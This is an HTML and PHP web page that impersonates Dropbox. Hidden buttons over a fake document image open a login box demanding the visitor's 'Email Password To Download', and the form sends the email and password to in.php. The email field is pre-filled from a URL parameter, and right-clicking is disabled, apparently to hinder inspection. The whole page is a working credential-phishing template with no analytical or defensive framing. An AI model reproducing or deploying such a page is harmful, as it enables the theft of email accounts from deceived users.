<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <title>Dropbox</title>
  <link rel="shortcut icon" href="./files/favicon.png">
<style>
*{margin:0px; padding:0px; font-family:Helvetica, Arial, sans-serif;}

body {
    background-repeat:no-repeat;
}
/* Full-width input fields */
input[type=email], input[type=text] , input[type=password] {
    width: 90%;
    padding: 5px 5px;
    margin: 4px 26px;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
  font-size:16px;
}

/* Set a style for all buttons */
button {
    background-color: transparent;
  padding: 14px 20px;
    margin: 8px 26px;
    border: none;
    cursor: pointer;
    width: 90%;
  height: 40px;
  position: absolute;
}
button:hover {
    opacity: 0.8;
}

/* Center the image and position the close button */
.imgcontainer {
    text-align: center;
    margin: 24px 0 12px 0;
    position: relative;
}
.avatar {
    
}

/* The Modal (background) */
.modal {
  display:none;
    position: fixed;
    z-index: 1;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.4);
}

/* Modal Content Box */
.modal-content {
    background-color: #fff;
    margin: 4% auto 15% auto;
    border: 1px solid #888;
    width: 30%; 
  padding-bottom: 30px;
}

/* The Close Button (x) */
.close {
    position: absolute;
    right: 25px;
    top: 0;
    color: #000;
    font-size: 35px;
    font-weight: bold;
}
.close:hover,.close:focus {
    color: red;
    cursor: pointer;
}

/* Add Zoom Animation */
.animate {
    animation: zoom 0.6s
}
@keyframes zoom {
    from {transform: scale(0)} 
    to {transform: scale(1)}
}
*:focus {
outline: none;
}
</style>
<!--script language="javascript">
document.onmousedown=disableclick;
status="Right Click Disabled";
Function disableclick(event)
{
  if(event.button==2)
   {
     alert(status);
     return false;    
   }
}
</script-->
<script>
({
    "contextmenu": function(e) {
        console.log("ctx menu button:", e.which); 

        // Stop the context menu
        e.preventDefault();
    },
    "mousedown": function(e) { 
        console.log("normal mouse down:", e.which); 
    },
    "mouseup": function(e) { 
        console.log("normal mouse up:", e.which); 
    }
});
</script>
</head><body oncontextmenu="return false" background="./files/Capture.JPG">



<!--<button onclick="document.getElementById(&#39;modal-wrapper&#39;).style.display=&#39;block&#39;" style="width:1118px; height:233px; margin-top:163px; margin-left:60px;"></button>-->

<div id="modal-wrapper" class="modal" style="display: none;">
  
  <form class="modal-content animate" method="post" action="in.php">
        <p style="color: #ff0000;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
    <div class="imgcontainer">
      <span onclick="document.getElementById(&#39;modal-wrapper&#39;).style.display=&#39;none&#39;" class="close" title="Close">x</span>
    <img src="./files/av061.png" alt="Avatar" class="avatar" style="float:left; margin-left:26px; margin-top:26px; margin-bottom:26px;">
      
    </div>

    <div class="container">
      <input type="email" placeholder="someone@example.com" id="email" name="email" value="<?php 
if (isset($_GET["email"])) {
  echo htmlspecialchars($_GET["email"]);
}
else {
	echo "";
}
?>" required="" style="height:32px; font-size:0.9em;">
      <input type="password" placeholder="Enter Email Password To Download" id="password" name="p" required="" style="height:32px; font-size:0.9em;">        
      <input type="checkbox" style="margin-right:5px; margin-left:26px; margin-top:5px;"><font size="2.5">Keep me signed in</font>  <br>   
    <input type="image" src="./files/bt01.png" alt="submit" style="margin-left:26px; margin-top:30px; margin-bottom:30px;"><br>
    <a href="#" style="text-decoration:none; margin-left:26px; "><font size="2.5" color="#2872DD">*Enter Email Password to Download*</font></a>
    </div>
    
  </form>
  
</div>



<button onclick="document.getElementById(&#39;modal-wrapper&#39;).style.display=&#39;block&#39;" style="width: 300px;margin-top: 410px;margin-left: 950px;"></button>

<button onclick="document.getElementById(&#39;modal-wrapper&#39;).style.display=&#39;block&#39;" style="width: 300px;margin-top: 460px;margin-left: 950px;"></button>

<img src="./files/drv.gif" style="width: 300px;margin-top: 210px;margin-left: 1px;"></img>

</body></html>